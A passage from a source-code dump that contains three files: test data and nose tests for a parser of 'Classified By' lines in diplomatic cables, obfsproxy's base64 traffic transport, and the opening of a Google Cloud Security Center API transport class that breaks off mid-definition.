'''),
(u'09ISTANBUL137', u'Sandra Oudkirk', u'''
Classified By: ConGen Istanbul DPO Sandra Oudkirk; Reason 1.5 (d)
'''),
(u'08BANGKOK1778', u'James F. Entwistle', u'''
Classified By: Charge, d,Affaires a. i. James F. Entwistle, reason 1.4
(b) and (d).
'''),
(u'08MANAMA301', u'Christopher Henzel', u'''
Classified By: Charge d,Affaires a.i. Christopher Henzel, reasons 1.4(b
) and (d).
'''),
(u'06COLOMBO123', u'Robert O. Blake, Jr.', u'''
Classified By: Abassador Robert O. Blake, Jr. for reasons
1.4 (b and (d).
'''),
(u'08YEREVAN907', u'Marie Yovanovitch', u'''
Classified By: Amabassador Marie Yovanovitch. Reason 1.4 (B/D)
'''),
(u'09QUITO329', u'Heather M. Hodges', u'''
Classified By: AMB Heather M. Hodges for reason 1.4 (D)
'''),
(u'09STATE38028', (u'KARL WYCOFF', u'SHARI VILLAROSA'), u'''
CLASSIFIED BY AF KARL WYCOFF, ACTING AND S/CT DAS SHARI
VILLAROSA ; E.O. 12958 REASON: 1.4 (B) AND (D)
'''),
(u'04ABUJA2060', u'BRUCE EHRNMAN', u'''
Classified By: AF SPECIAL ADVISOR BRUCE EHRNMAN FOR REASONS 1.5 (B) AND
(D)
'''),
(u'06ISLAMABAD3684', u'RCROCKER', u'''
Classified By: AMB:RCROCKER, Reasons 1.4 (b) and (c)
'''),
(u'06MANAMA184', u'William T.Monroe', u'''
Classified By: Classified by Ambassadior William T.Monroe. Reasons: 1.
4 (b)(d)
'''),
(u'07SANSALVADOR263', u'Charles Glazer', u'''
Classified By: Ambasasdor Charles Glazer, Reasons
1.4 (b) and (d)
'''),
(u'05BRUSSELS1549', u'Michael Ranneberger', u'''
Classified By: AF PDAS Michael Ranneberger. Reasons 1.5 (b) and (d).
'''),
(u'09STATE14163', u'Mark Boulware', u'''
Classified By: AF Acting DAS Mark Boulware, Reasons 1.4 (b) and (d).
'''),
(u'06AITTAIPEI1142', u'Michael R. Wheeler', u'''
Classified By: IPO Michael R. Wheeler for reason 1.4(G)(E)
'''),
(u'08TAIPEI1038', u'Stephen M. Young', u'''
Classified By: AIT Chairman Stephen M. Young,
Reasons: 1.4 (b/d)
'''),
(u'09STATE96519', u'Ellen O. Tauscher', u'''
Classified By: T U/S Ellen O. Tauscher for Reasons 1.4 a,b,and d.
'''),
(u'08NAIROBI232', u'JOHN M. YATES', u'''
Classified By: SPECIAL ENVOY JOHN M. YATES
1. (C) '''),
(u'07COLOMBO769', u'Robert O. Blake, Jr.', u'''
Classified By: Ambassodor Robert O. Blake, Jr. for reasons 1.4 (b, d).
'''),
(u'04DJIBOUTI1541', u'MARGUERITA D. RAGSDALE', u'''
Classified By: AMBASSSADOR MARGUERITA D. RAGSDALE.
REASONS 1.4 (B) AND (D).
'''),
(u'08MOSCOW3202', u'David Kostelancik', u'''
Classified By: Acting Political MC David Kostelancik for reasons 1.4(b)
and (d).
'''),
(u'09BEIJING939', u'Ben Moeling', u'''
Classified By: Acting Political Minister-Couselor
Ben Moeling, reasons 1.4 (b/d).
'''),
(u'09HAVANA689', u'Jonathan Farrar', u'''
Classified By: Principal Office Jonathan Farrar for reasons 1.4 (b) and
(d)
'''),
(u'07VIENNA2687', u'J. Dean Yap', u'''
Classified By: Political Economic Counselr J. Dean Yap for reasons 1.4
(b) and (d)
'''),
(u'08LONDON1485', u'Maura Connelly', u'''
Classified By: Political Minister Counsel Maura Connelly for reasons 1.
4 (b/d).
'''),
(u'07LONDON3228', u'JOHN MCNAMARA', u'''
Classified By: A E/MIN COUNS. JOHN MCNAMARA, REASONS 1.4(B) AND (D)
'''),
(u'05ABUJA2031', u'Rich Verrier', u'''
Classified By: ARSO Rich Verrier for reason 1.4 (d)
'''),
(u'09USOSCE235', u'Chris Ellis', u'''
Classified By: Acting Chief Arms Control Delegate Chris Ellis,
for reasons 1.4(b) and (d).
'''),
(u'06RANGOON1542', u'Walter Parrs III', u'''
Classified By: Conoff Walter Parrs III for Reasons 1.4 (b) and (d)
'''),
(u'08STATE109148', u'Pam Durham', u'''
Classified By: ISN/MTR Direcotr Pam Durham.
Reason: 1.4 (B), (D).
'''),
(u'08STATE3581', u'AFriedt', u'''
Classified By: EUR/PRA, Dir. AFriedt, Reason 1.4 (b/d)
'''),
(u'06HONGKONG3109', u'JEFF ZAISER', u'''
CLASSIFIED BY: ACTING E/P CIEF JEFF ZAISER. REASONS: 1.4(B,D).
'''),
(u'07LAPAZ123', u'Brian Quigley', u'''
Classified By: Acting Ecopol Councilor Brian Quigley for reasons 1.4 (d
) and (e).
'''),
(u'08BAGHDAD3818', u'Michael Dodman', u'''
Classified By: A/EMIN Michael Dodman, Reasons 1.4 (b,d).
'''),
(u'09BAGHDAD565', u'Michael Dodman', u'''
Classified By: Acting EMIN Michael Dodman, reasons 1.4 (b,d).
'''),
(u'09BUDAPEST198', u'Jon Martinson', u'''
Classified By: Acting P/E Counseor Jon Martinson, reasons 1.4 (b,d)
'''),
(u'09BUDAPEST276', u'Jon Martinson', u'''
Classified By: Acting P/E Counsleor Jon Martinson, reasons 1.4 (b,d)
'''),
(u'08STATE67468', u'George Krol', u'''
Classified By: SCA/DAS for Central Asia George Krol
1. (C) '''),
(u'09STATE24316', u'GEORGE KROL', u'''
Classified By: DEPUTY ASSISTANT SECRETARY OF STATE FOR
CENTRAL ASIA GEORGE KROL FOR REASONS 1.4 (B) AND (D)
'''),
(u'08STATE82744', u'BRIAN HOOK', u'''
Classified By: CLASSIFIED BY IO A/S ACTING BRIAN HOOK
FOR REASONS 1.4(B) AND (D).
'''),
(u'09SINGAPORE773', u'Daniel Shields', u'''
Classified By: Charge d'Affaires (CDA) Daniel Shields for Reasons 1.4 (
b/b)
'''),
(u'07ASHGABAT350', u'Richard Hoagland', u'''
Classified By: Classified by Acting Charge d\'Affaires, Ambassador Richa
rd Hoagland, for reasons 1.4(B) and (D).
'''),
(u'05NEWDELHI8162', u'Bob Blake', u'''
Classified By: Charge' Bob Blake for Reasons 1.4 (B, D)
'''),
(u'07RIYADH1028', u'BOB SILVERMAN', u'''
Classified By: ECONOMIC COUNSELOR BOB SILVERMAN
FOR 12958 1.4 B, D, AND E
'''),
(u'05ROME3781', u'ANNA BORG', u'''
Classified By: DCM ANNA BORG BASED ON E.O.12958 REASONS 1.4 (b) and (d)
'''),
(u'09STATE2508', u'PATRICIA A. MCNERNEA', u'''
CLASSIFIED BY: ISN ? PATRICIA A. MCNERNEA, ACTING
ASSISTANT SECRETARY, REASON 1.4 (B) AND (D)
'''),
(u'03OTTAWA2182', u'Mary Witt', u'''
Classified By: A/ Pol Min Mary Witt for reasons 1.5(b) and (d)
'''),
(u'03KUWAIT3762', u'FRANK URBANCIC', u'''
Classified By: CDA FRANK URBANCIC BASED UPON REASONS 1.5 (B) AND (D)
'''),
(u'07DAKAR1464', u'GARY SCHAAF', u'''
Classified By: A/LEGATT GARY SCHAAF FOR RASONS 1.4 (B) AND (D).
'''),
(u'07HARARE680', u'Glenn Warren', u'''
Classified By: Pol/Econ Chief Glenn Warren under 1.4 b/d
'''),
(u'09DHAKA775', u'James Moriarty', u'''
Classified By: Ambassador James Moriarty for for reasons 1.4 b and d.
'''),
(u'', u'Kelly A. Keiderling', u'''
Classified By: CDA Kelly A. Keiderling under 1.4 (b) and (d)
'''),
(u'04HARARE1722', u'Paul Weisenfeld', u'''
Classified By: Classified by Charge d'Affaires Paul Weisenfeld under Se
ction 1.5 b/d
'''),
(u'05SANTIAGO2540', u'SEAN MURPHY', u'''
Classified By: CONSUL GENERAL SEAN MURPHY
1. In a December 19 m'''),
(u'04HELSINKI1420', u'Earle I. Mack', u'''
Classified By: Ambassador Earle I. Mack for reasons 1.5(B) and (D)
Summary
-------
'''),
(u'08PORTAUPRINCE520', u'Janet A. Sanderson', u'''
Classified By: Ambassado Janet A. Sanderson for reasons 1.4 (b) and (d
)
'''),
(u'97SOFIA3097', u'B0HLEN', u'''
1.(U) CLASSIFIED BY AMBASSAD0R B0HLEN. REAS0N:
1.5(B,D).
'''),
(u'99TUNIS2120', u'R0BIN L. RAPHEL', u'''
(U) CLASSIFIED BY AMBASSAD0R R0BIN L. RAPHEL BASED 0N 1.5 (B)
AND (D).
'''),
(u'08TBILISI1121', u'John F. Tefft', u'''
Classified By: Ambassadot John F. Tefft for reason 1.4 (b) and (d).
'''),
(u'07ANKARA2522', u'ROSS WILSON', u'''
Classified By: AMBASSADR ROSS WILSON FOR REASONS 1.4 (B) AND (D)
'''),
(u'09UNVIEVIENNA531', u'Glyn T. Davies', u'''
Classified By: Ambassadro Glyn T. Davies, reasons 1.4 (b) and (d)
'''),
(u'09TBILISI463', u'JOHN F. TEFFT', u'''
Classified By: AMBSSADOR JOHN F. TEFFT. REASONS: 1.4 (B) AND (D).
'''),
(u'09LUSAKA523', u'Donald E. Booth', u'''
Classified By: Classified By: Ambbassador Donald E. Booth for
Reasons 1.4 (b) and (d)
'''),
(u'07BAKU486', u'Anne E. Derse', u'''
Classified By: Ambssador Anne E. Derse, Reasons 1.4 (b,d)
'''),
(u'09ANKARA63', u'A.F. Godfrey', u'''
Classified By: Pol-Mil Counselor A.F. Godfrey
Will Not Break Silence...
-------------------------
1. (C) I'''),
(u'03SANAA1319', u'ALAN MISENHEIMER', u'''
Classified By: CHARGE ALAN MISENHEIMER F0R REASONS 1.5 (B) AND (D)
'''),
(u'08BAKU668', u'Alan Eyre', u'''
Classified By: Acting Pol/Econ Chief Alan Eyre
(S) In '''),
(u'07SINGAPORE285', u'Ike Reed', u'''
Classified By: Economical and Political Chief Ike Reed;
reasons 1.4 (b) and (d)
'''),
(u'07KHARTOUM832', u'Roberto Powers', r'''
Classified By: CDA Roberto Powers a.y., Sea3on: Sectaons 9.Q (b+`ald$hd
)Q
Q,----/-Qswmmfrq
=,=--=HQ(@(RBF!&}ioSQB3wktf0r,vu qDWTel$1` \ulQlQO~jcvq>&Mw~ifw(U= ;QGM?QQx7Ab8QQ@@)\Minawi suggested that
intelligence chief Salah Ghosh was the sole interlocutor with
the "statesmanship" and influence within the regime to defuse
tensions with the international community. Embassy officials
told Minawi that the NCP would need to demonstrate its
genuine desire for better relations by agreeing to an
effective UN peace-keeping operation, which could then lay
the basis for future discussions. Minawi also commented on
Chad's obstruction of the Darfur peace process and an
upcoming visit of Darfurian officials to Arab capitals. End
summary.
-------------'''),
(u'05ANKARA7671', u'Nancy McEldowney', u'''
Classified By: ADANA 222
ADANA 216
ADANA 207
ANKARA 6772
Classified by DCM Nancy McEldowney; reasons 1.4 b and d.
'''),
(u'04HARARE766', u'ROBERT E. WHITEHEAD', u'''
Classified By: DCM ROBERT E. WHITEHEAD DUE TO 1,4 (C) AND (D).
'''),
(u'00TELAVIV4462', u'PSIMONS', u'''C O N F I D E N T I A L TEL AVIV 004462
- - C O R R E C T E D C O P Y - - CLASSIFIED BY LINE ADDED
E.O. 12958: DECL: 08/24/05
TAGS: KWBG, PTER, PGOV, PREL, IS
SUBJECT: BIN LADIN CONNECTION IN GAZA FOUND PUZZLING;
CONNECTION TO HAMAS QUESTIONED
CLASSIFIED BY DCM PSIMONS PER 1.5 (B) AND (D)
'''),
)
_TEST_CABLES = (
(u'10BANGKOK468', ()),
(u'08STATE110079', ()),
(u'05VILNIUS1093', u'Derrick Hogan'),
(u'08STATE20184', ()),
(u'08STATE20332', ()),
(u'09ANKARA63', u'A.F. Godfrey'),
(u'03COLOMBO1348', u'Alex Moore'),
(u'03COLOMBO1810', u'Alex Moore'),
(u'66BUENOSAIRES2481', ()),
(u'05TAIPEI153', ()),
(u'09TELAVIV2643', ()),
(u'09BOGOTA2917',()),
(u'07TOKYO5202', ()),
(u'07USUNNEWYORK319', ()),
(u'07VIENNA1239', ()),
(u'09HONGKONG2247', ()),
(u'07TOKYO3205', ()),
(u'09HONGKONG2249', ()),
(u'07BELGRADE533', u'Ian Campbell'),
(u'05AMMAN646', ()),
(u'08BAGHDAD1451', u'Jess Baily'),
(u'08BAGHDAD1650', u'Jess Baily'),
(u'98STATE145892', u'Jeff Millington'),
(u'07TOKYO1414', ()),
(u'06COPENHAGEN1020', u'Bill Mozdzierz'),
(u'07ANKARA1581', u'Eric Green'),
(u'08ANKARA266', u'Eric Green'),
(u'08CHISINAU933', u'Daria Fane'),
(u'10RIGA27', u'Brian Phipps'),
(u'09WARSAW433', u'Jackson McDonald'),
(u'09BAGHDAD2784', u'Anbar'),
(u'05PARIS8353', u'Andrew, C. Koss'),
(u'05ANKARA581', u'John Kunstadter'),
(u'08RANGOON951', u'Drake Weisert'),
(u'10BAGHDAD488', u'John Underriner'),
(u'08STATE2004', u'Gordon Gray'),
(u'10BAGHDAD370', ()),
(u'09BEIJING951', u'Ben Moeling'),
(u'09TOKYO1878', u'Ray Hotz'),
(u'07OTTAWA100', u'Brian Mohler'),
(u'07BAMAKO1322', ()),
(u'09PRISTINA336', u'Michael J. Murphy'),
(u'09PRISTINA345', u'Michael J. Murphy'),
(u'06BAGHDAD4604', u'L. Hatton'),
(u'05ROME178', (u'Castellano', u'Anna della Croce', u'Giovanni Brauzzi')),
(u'08USNATO348', u'W.S. Reid III'),
(u'09KHARTOUM107', u'Alberto M. Fernandez'),
(u'09ABUDHABI901', u'Douglas Greene'),
(u'03KUWAIT2352', u'Frank C. Urbancic'),
(u'09BUENOSAIRES849', u'Tom Kelly'),
(u'08BAGHDAD358', u'Todd Schwartz'),
(u'09BAGHDAD419', u'Michael Dodman'),
(u'10ADDISABABA186', ()),
(u'10ADDISABABA195', ()),
(u'10ASHGABAT178', u'Sylvia Reed Curran'),
(u'09MEXICO2309', u'Charles Barclay'),
(u'09MEXICO2339', u'Charles Barclay'),
(u'05ATHENS1903', u'Charles Ries'),
(u'02VATICAN25', u'Joseph Merante'),
(u'07ATHENS2029', u'Robin'),
(u'09HONGKONG934', ()),
(u'03KATHMANDU1044', u'Robert Boggs'),
(u'08CARACAS420', u'Robert Richard Downes'),
(u'08DHAKA812', u'Geeta Pasi'),
(u'09ULAANBAATAR87', ()),
(u'96JEDDAH948', u'Douglas Neumann'),
(u'09KABUL3161', u'Hoyt Yee'),
(u'03OTTAWA202', u'Brian Flora'),
(u'10GUATEMALA25', u'Drew G. Blakeney'),
(u'07CARACAS2254', u'Robert Downes'),
(u'09BUCHAREST115', u'Jeri Guthrie-Corn'),
(u'09BUCHAREST166', u'Jeri Guthrie-Corn'),
(u'06PANAMA2357', u'Luis Arreaga'),
(u'09JAKARTA1580', u'Ted Osius'),
(u'09JAKARTA1581', u'Ted Osius'),
(u'07ATHENS2219', u'Thomas Countryman'),
(u'09ANKARA1084', u"Daniel O'Grady"),
(u'10ANKARA173', u"Daniel O'Grady"),
(u'10ANKARA215', u"Daniel O'Grady"),
(u'10ANKARA224', u"Daniel O'Grady"),
(u'07BAGHDAD1513', u'Daniel V. Speckhard'),
(u'08TASHKENT1089', u'Jeff Hartman'),
(u'07HELSINKI636', u'Joy Shasteen'),
(u'09STATE57323', u'James Townsend'),
(u'09STATE59436', u'James Townsend'),
(u'07TASHKENT2064', (u'Jeff Hartman', u'Steven Prohaska')),
(u'07DUSHANBE337', u'David Froman'),
(u'07DUSHANBE1589', u'David Froman'),
(u'08SANJOSE762', u'David E. Henifin'),
(u'05BAGHDAD3037', u'David M. Satterfield'),
(u'04AMMAN4133', u'D.Hale'),
(u'06YEREVAN237', u'A.F. Godfrey'),
(u'07DHAKA909', u'Dcmccullough'),
(u'07DHAKA1057', u'DCMcCullough'),
(u'07BAKU1017', u'Donald Lu'),
(u'07USNATO92', u'Clarence Juhl'),
(u'09KAMPALA272', u'Dcronin'),
(u'06LAGOS12', u'Sam Gaye'),
(u'07USNATO548', u'Clarence Juhl'),
(u'07TOKYO436', u'Carol T. Reynolds'),
(u'08STATE116100', u'Theresa L. Rusch'),
(u'07NEWDELHI5334', u'Ted Osius'),
(u'06BAGHDAD4350', u'Zalmay Khalilzad'),
(u'07STATE141771', u'Scott Marciel'),
(u'08STATE66299', u'David J. Kramer'),
(u'09STATE29700', u'Karen Stewart'),
(u'07NAIROBI4569', u'Jeffrey M. Roberts'),
(u'02HARARE2628', u'Rewhitehead'),
(u'04HARARE766', u'Robert E. Whitehead'),
(u'04ANKARA7050', u'John Kunstadter'),
(u'04ANKARA6368', u'Charles O. Blaha'),
(u'09BAGHDAD280', ()),
(u'05ABUJA1323', ()),
(u'07MONROVIA1375', u'Donald E. Booth'),
(u'03SANAA2434', u'Austin G. Gilreath'),
(u'07BRUSSELS3482', u'Maria Metcalf'),
(u'02KATHMANDU1201', u'Pete Fowler'),
(u'09STATE2522', u'Donald A. Camp'),
(u'09STATE100197', u'Roblake'),
(u'08COLOMBO213', u'Robert O. Blake, Jr.'),
(u'07MEXICO2653', u'Charles V. Barclay'),
(u'09SOFIA89', u'Mceldowney'),
(u'09ADDISABABA2168', u'Kirk McBride'),
(u'06MINSK338', u'George Krol'),
(u'10ADDISABABA195', ()),
(u'04AMMAN9411', u'Christopher Henzel'),
(u'06CAIRO4258', u'Catherine Hill-Herndon'),
(u'08NAIROBI233', u'John M. Yates'),
(u'06MADRID2993', ()),
(u'08AMMAN1821', ()),
(u'09KABUL1290', u'Patricia A. McNerney'),
(u'06JEDDAH765', u'Tatiana C. Gfoeller'),
(u'07BAGHDAD2045', u'Stephen Buckler'),
(u'07BAGHDAD2499', u'Steven Buckler'),
(u'04THEHAGUE1778', u'Liseli Mundie'),
(u'04THEHAGUE2020', u'John Hucke'),
(u'03HARARE1511', u'R.E. Whitehead'),
(u'03BRUSSELS4518', u'Van Reidhead'),
(u'02ROME4724', u'Douglas Feith'),
(u'08BRUSSELS1149', u'Chris Davis'),
(u'04BRUSSELS862', u'Frank Kerber'),
(u'08BRUSSELS1245', u'Chris Davis'),
(u'08BRUSSELS1458', u'Chris Davis'),
(u'07ISLAMABAD2316', u'Peter Bodde'),
(u'04MADRID764', u'Kathleen Fitzpatrick'),
(u'06BELGRADE1092', u'Ian Campbell'),
(u'07JERUSALEM1523', u'Jake Walles'),
(u'09PANAMA518', u'Barbar J. Stephenson'),
(u'06ABUDHABI409', u'Michelle J Sison'),
(u'07DOHA594', ()),
(u'07LAPAZ3136', u'Mike Hammer'),
(u'08BOGOTA4462', u'John S. Creamer'),
(u'09ATHENS1515', u'Deborah McCarthy'),
(u'09LONDON2347', u'Robin Quinville'),
(u'08LONDON821', u'Richard Mills, Jr.'),
(u'06BUENOSAIRES497', u'Line Gutierrez'),
(u'06BUENOSAIRES596', u'Line Gutierrez'),
(u'06BUENOSAIRES1243', u'Line Gutierrez'),
(u'05BAGHDAD3919', u'Robert Heine'),
(u'06RIYADH8836', u'Mgfoeller'),
(u'06BAGHDAD4422', u'Margaret Scobey'),
(u'08STATE129873', u'David Welch'),
(u'09BAGHDAD2299', u'Patricia Haslach'),
(u'09BAGHDAD2256', u'Phaslach'),
(u'09BAGHDAD2632', u'Phaslach'),
(u'04BAGHDAD697', u'Matthew Goshko'),
(u'05CAIRO8812', u'John Desrocher'),
(u'06HONGKONG4299', ()),
(u'06QUITO646', u'Vanessa Schulz'),
(u'08RIYADH1616', u'Scott McGehee'),
(u'08RIYADH1659', u'Scott McGehee'),
(u'10BAGHDAD481', u'W.S. Reid'),
(u'02KATHMANDU485', u'Pmahoney'),
(u'09BAGHDAD990', u'Robert Ford'),
(u'08BAGHDAD3023', u'Robert Ford'),
(u'09USNATO530', u'Kelly Degnan'),
(u'07LISBON2305', u'Lclifton'),
(u'08BAGHDAD4004', u'John Fox'),
(u'04THEHAGUE2346', u'A. Schofer'),
(u'07TALLINN173', u'Jessica Adkins'),
(u'09BAKU80', u'Rob Garverick'),
(u'06PHNOMPENH1757', u'Jennifer Spande'),
(u'06QUITO1401', u'Ned Kelly'),
(u'05ZAGREB724', u'Justin Friedman'),
(u'05TOKYO1351', u'David B. Shear'),
(u'07KIGALI73', u'G Learned'),
(u'08ZAGREB554', u"Peter D'Amico"),
(u'07TASHKENT1950', (u'R. Fitzmaurice', u'T. Buckley')),
(u'07TASHKENT1679', (u'Richard Fitzmaurice', u'Steven Prohaska')),
(u'07TASHKENT1894', (u'Steven Prohaska', u'Richard Fitzmaurice')),
(u'08STATE68478', u'Margaret McKelvey'),
(u'04BRUSSELS416', u'Marc J. Meznar'),
(u'07BAGHDAD777', u'Jim Soriano'),
(u'05ALMATY3450', u'John Ordway'),
(u'05ACCRA2548', u'Nate Bluhm'),
(u'07ADDISABABA2523', u'Kent Healy'),
(u'09USUNNEWYORK746', u'Bruce C. Rashkow'),
(u'09STATE108370', u'Daniel Fried'),
(u'09BAGHDAD3120', u'Mark Storella'),
(u'09STATE64621', u'Richard C Holbrooke'),
(u'05NAIROBI4757', u'Chris Padilla'),
(u'05CAIRO5945', u'Stuart E. Jones'),
(u'07BAGHDAD1544', u'Steven R. Buckler'),
(u'07BAGHDAD1632', u'Steven R. Buckler'),
(u'02HARARE555', u'Aaron Tarver'),
(u'06BAGHDAD1021', u'Robert S. Ford'),
(u'06PRISTINA280', u'Philip S. Goldberg'),
(u'06SANSALVADOR849', u'Michael A. Butler'),
(u'06SUVA123', u'Larry M. Dinger'),
(u'06AITTAIPEI1142', u'Michael R. Wheeler'),
(u'08BEIRUT471', u'Michele J. Sison'),
(u'08MOSCOW937', u'Eric T. Schultz'),
(u'02HANOI2951', u'Emi Yamauchi'),
(u'08ROME525', u'Tom Delare',),
(u'01HARARE1632', u'Earl M. Irving'),
(u'06DUBAI5421', u'Timothy M. Brys'),
)
def test_parse_classified_by():
def check(expected, content, normalize):
if not isinstance(expected, tuple):
expected = (expected,)
eq_(expected, tuple(parse_classified_by(content, normalize)))
for testcase in _TEST_DATA:
if len(testcase) == 3:
ref_id, expected, content = testcase
normalize = False
else:
ref_id, expected, content, normalize = testcase
yield check, expected, content, normalize
def test_cable_classified_by():
def check(cable_id, expected):
if not isinstance(expected, tuple):
expected = (expected,)
cable = cable_by_id(cable_id)
ok_(cable, 'Cable "%s" not found' % cable_id)
eq_(expected, tuple(cable.classified_by))
for cable_id, expected in _TEST_CABLES:
yield check, cable_id, expected
if __name__ == '__main__':
import nose
nose.core.runmodule()
| bsd-3-clause | 7,676,235,879,460,244,000 | 36.018762 | 210 | 0.634053 | false |
sunsong/obfsproxy | obfsproxy/transports/b64.py | 1 | 2455 | #!/usr/bin/python
# -*- coding: utf-8 -*-
""" This module contains an implementation of the 'b64' transport. """
from obfsproxy.transports.base import BaseTransport
import base64
import obfsproxy.common.log as logging
log = logging.get_obfslogger()
def _get_b64_chunks_from_str(string):
"""
Given a 'string' of concatenated base64 objects, return a list
with the objects.
Assumes that the objects are well-formed base64 strings. Also
assumes that the padding character of base64 is '='.
"""
chunks = []
while True:
pad_loc = string.find('=')
if pad_loc < 0 or pad_loc == len(string)-1 or pad_loc == len(string)-2:
# If there is no padding, or it's the last chunk: append
# it to chunks and return.
chunks.append(string)
return chunks
if pad_loc != len(string)-1 and string[pad_loc+1] == '=': # double padding
pad_loc += 1
# Append the object to the chunks, and prepare the string for
# the next iteration.
chunks.append(string[:pad_loc+1])
string = string[pad_loc+1:]
return chunks
class B64Transport(BaseTransport):
"""
Implements the b64 protocol. A protocol that encodes data with
base64 before pushing them to the network.
"""
def __init__(self, transport_config):
super(B64Transport, self).__init__()
def receivedDownstream(self, data):
"""
Got data from downstream; relay them upstream.
"""
decoded_data = ''
# TCP is a stream protocol: the data we received might contain
# more than one b64 chunk. We should inspect the data and
# split it into multiple chunks.
b64_chunks = _get_b64_chunks_from_str(data.peek())
# Now b64 decode each chunk and append it to the our decoded
# data.
for chunk in b64_chunks:
try:
decoded_data += base64.b64decode(chunk)
except TypeError:
log.info("We got corrupted b64 ('%s')." % chunk)
return
data.drain()
self.circuit.upstream.write(decoded_data)
def receivedUpstream(self, data):
"""
Got data from upstream; relay them downstream.
"""
self.circuit.downstream.write(base64.b64encode(data.read()))
return
class B64Client(B64Transport):
pass
class B64Server(B64Transport):
pass
| bsd-3-clause | 6,540,606,080,512,612,000 | 25.978022 | 82 | 0.606517 | false |
googleapis/googleapis-gen | google/cloud/securitycenter/v1p1beta1/securitycenter-v1p1beta1-py/google/cloud/securitycenter_v1p1beta1/services/security_center/transports/base.py | 1 | 22937 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import abc
from typing import Awaitable, Callable, Dict, Optional, Sequence, Union
import packaging.version
import pkg_resources
import google.auth # type: ignore
import google.api_core # type: ignore
from google.api_core import exceptions as core_exceptions # type: ignore
from google.api_core import gapic_v1 # type: ignore
from google.api_core import retry as retries # type: ignore
from google.api_core import operations_v1 # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.oauth2 import service_account # type: ignore
from google.cloud.securitycenter_v1p1beta1.types import finding
from google.cloud.securitycenter_v1p1beta1.types import finding as gcs_finding
from google.cloud.securitycenter_v1p1beta1.types import notification_config
from google.cloud.securitycenter_v1p1beta1.types import notification_config as gcs_notification_config
from google.cloud.securitycenter_v1p1beta1.types import organization_settings
from google.cloud.securitycenter_v1p1beta1.types import organization_settings as gcs_organization_settings
from google.cloud.securitycenter_v1p1beta1.types import security_marks as gcs_security_marks
from google.cloud.securitycenter_v1p1beta1.types import securitycenter_service
from google.cloud.securitycenter_v1p1beta1.types import source
from google.cloud.securitycenter_v1p1beta1.types import source as gcs_source
from google.iam.v1 import iam_policy_pb2 # type: ignore
from google.iam.v1 import policy_pb2 # type: ignore
from google.longrunning import operations_pb2 # type: ignore
from google.protobuf import empty_pb2 # type: ignore
try:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
gapic_version=pkg_resources.get_distribution(
'google-cloud-securitycenter',
).version,
)
except pkg_resources.DistributionNotFound:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()
try:
# google.auth.__version__ was added in 1.26.0
_GOOGLE_AUTH_VERSION = google.auth.__version__
except AttributeError:
try: # try pkg_resources if it is available
_GOOGLE_AUTH_VERSION = pkg_resources.get_distribution("google-auth").version
except pkg_resources.DistributionNotFound: # pragma: NO COVER
_GOOGLE_AUTH_VERSION = None
class SecurityCenterTransport(abc.ABC):
"""Abstract transport class for SecurityCenter."""
AUTH_SCOPES = (
'https://www.googleapis.com/auth/cloud-platform',
)
DEFAULT_HOST: str = 'securitycenter.googleapis.com'
def __init__(
self, *,
host: str = DEFAULT_HOST,
credentials: ga_credentials.Credentials = None,
credentials_file: Optional[str] = None,
scopes: Optional[Sequence[str]] = None,
quota_project_id: Optional[str] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
always_use_jwt_access: Optional[bool] = False,
**kwargs,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]):
The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is mutually exclusive with credentials.
scopes (Optional[Sequence[str]]): A list of scopes.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
always_use_jwt_access (Optional[bool]): Whether self signed JWT should
be used for service account credentials.
"""
# Save the hostname. Default to port 443 (HTTPS) if none is specified.
if ':' not in host:
host += ':443'
self._host = host
scopes_kwargs = self._get_scopes_kwargs(self._host, scopes)
# Save the scopes.
self._scopes = scopes
# If no credentials are provided, then determine the appropriate
# defaults.
if credentials and credentials_file:
raise core_exceptions.DuplicateCredentialArgs("'credentials_file' and 'credentials' are mutually exclusive")
if credentials_file is not None:
credentials, _ = google.auth.load_credentials_from_file(
credentials_file,
**scopes_kwargs,
quota_project_id=quota_project_id
)
elif credentials is None:
credentials, _ = google.auth.default(**scopes_kwargs, quota_project_id=quota_project_id)
# If the credentials is service account credentials, then always try to use self signed JWT.
if always_use_jwt_access and isinstance(credentials, service_account.Credentials) and hasattr(service_account.Credentials, "with_always_use_jwt_access"):
credentials = credentials.with_always_use_jwt_access(True)
# Save the credentials.
self._credentials = credentials
# TODO(busunkim): This method is in the base transport
# to avoid duplicating code across the transport classes. These functions
# should be deleted once the minimum required versions of google-auth is increased.
# TODO: Remove this function once google-auth >= 1.25.0 is required
@classmethod
def _get_scopes_kwargs(cls, host: str, scopes: Optional[Sequence[str]]) -> Dict[str, Optional[Sequence[str]]]:
"""Returns scopes kwargs to pass to google-auth methods depending on the google-auth version"""
scopes_kwargs = {}
if _GOOGLE_AUTH_VERSION and (
packaging.version.parse(_GOOGLE_AUTH_VERSION)
>= packaging.version.parse("1.25.0")
):
scopes_kwargs = {"scopes": scopes, "default_scopes": cls.AUTH_SCOPES}
else:
scopes_kwargs = {"scopes": scopes or cls.AUTH_SCOPES}
return scopes_kwargs
def _prep_wrapped_messages(self, client_info):
# Precompute the wrapped methods.
self._wrapped_methods = {
self.create_source: gapic_v1.method.wrap_method(
self.create_source,
default_timeout=60.0,
client_info=client_info,
),
self.create_finding: gapic_v1.method.wrap_method(
self.create_finding,
default_timeout=60.0,
client_info=client_info,
),
self.create_notification_config: gapic_v1.method.wrap_method(
self.create_notification_config,
default_timeout=60.0,
client_info=client_info,
),
